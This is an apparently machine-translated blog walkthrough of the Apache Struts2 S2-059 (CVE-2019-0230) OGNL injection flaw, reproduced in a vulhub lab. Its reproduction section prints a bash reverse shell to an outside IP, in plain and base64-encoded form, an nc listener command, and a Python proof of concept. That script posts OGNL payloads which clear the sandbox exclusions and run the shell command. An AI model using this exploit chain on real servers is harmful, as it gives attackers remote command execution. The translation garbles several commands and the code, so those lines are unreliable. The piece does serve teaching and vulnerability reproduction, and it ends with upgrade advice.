Shulou(Shulou.com)05/31 Report--

This article introduces how to achieve struts2 S2-059 remote code execution vulnerability CVE-2019-0230 analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

In 2020, struts2 issued the warning of S2-059, and recently, the OGNL expression of S2-061 and S2-059 was triggered in the same way. The fix method of S2-059 is to fix only sandboxie bypass and not OGNL expression execution point, because the trigger condition of this expression execution is too harsh, and S2-061 again bypasses sandboxie of S2-059. Here I use S2-059 for testing.

1. Brief introduction

Struts2 is a very powerful Java Web open source framework launched by the Apache software organization, which is essentially equivalent to a servlet. Struts2 is based on MVC architecture and has a clear framework. It is usually used as a controller (Controller) to establish the data interaction between the model and the view, which is used to create enterprise-level Java web applications, which utilizes and extends Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design idea of WebWork as the core, absorbs some of the advantages of Struts framework, and provides a cleaner Web application framework for the implementation of MVC design patterns.

two。 Overview of vulnerabilities

On August 13, 2020, Apache officially issued a risk notice for the Struts2 remote code execution vulnerability, the vulnerability number is CVE-2019-0230, vulnerability level: high risk, vulnerability score: 8.5

The main reason for the vulnerability is that the Apache Struts framework performs secondary ognl parsing of attribute values assigned to certain tag attributes (such as id) when enforced. An attacker can construct a malicious OGNL expression and set it to be modified by external input and execute the attribute value of the Struts2 tag of the OGNL expression, causing OGNL expression parsing, resulting in the impact of remote code execution.

3. Affect the version

Apache Struts2:2.0.0-2.5.20

4. Environment build 4.1 this vulnerability environment is quickly built using vulhub, and the download address of vulhub is as follows:

Https://github.com/vulhub/vulhub

Unzip the vulhub-master.zip and copy it to kali.

Cd vulhub-master/

Cd struts/

Cd S2-059

4.2 use docker-compose to quickly build a shooting range environment.

Docker-compose build

Docker-compose up-d

4.3 after startup, visit http://ip:8080/ in the browser and you can see the test interface.

5. Vulnerability recurrence 5.1 when the browser accesses http://ip:8080/?id=%25{2*5}, it can be found that the executed 2x5 is parsed successfully, and the attribute value of the Struts2 tag of the OGNL expression is executed, causing the OGNL expression to be parsed.

5.2 use poc to bounce shell, and payload that bounces shell requires base64 encoding.

Bash-I > & / dev/tcp/192.168.169.130/6666 0 > & 1

Base64 coding URL:

Http://www.jackson-t.ca/runtime-exec-payloads.html

Execute nc-lvvp 6666 in 5.3kali to monitor.

Change payload to your own payload and copy it into the text and rename it 1.py. Run with python.

Import requests url = "http://127.0.0.1:8080" data1 = {" id ":"% {(# context=#attr ['struts.valueStack'] .context). (# container=#context [' com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.setExcludedClasses (')). (# ognlUtil.setExcludedPackageNames ('))} "} data2 = {" Id ":% {(# context=#attr ['struts.valueStack'] .context). (# context.setMemberAccess (@ ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)). (@ java.lang.Runtime@getRuntime () .exec (' bash-c {echo) YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2OS4xMzAvNjY2NiAwPiYx} | {base64,-d} | {bash,-i}')} "} res1 = requests.post (url, data=data1)

Res2 = requests.post (url, data=data2)

5.5 bounce shell

6. Fix recommendation 6.1 upgrade to Struts 2.5.22 or later. 6.2 enable ONGL expression injection protection. On how to achieve struts2 S2-059 remote code execution vulnerability CVE-2019-0230 analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.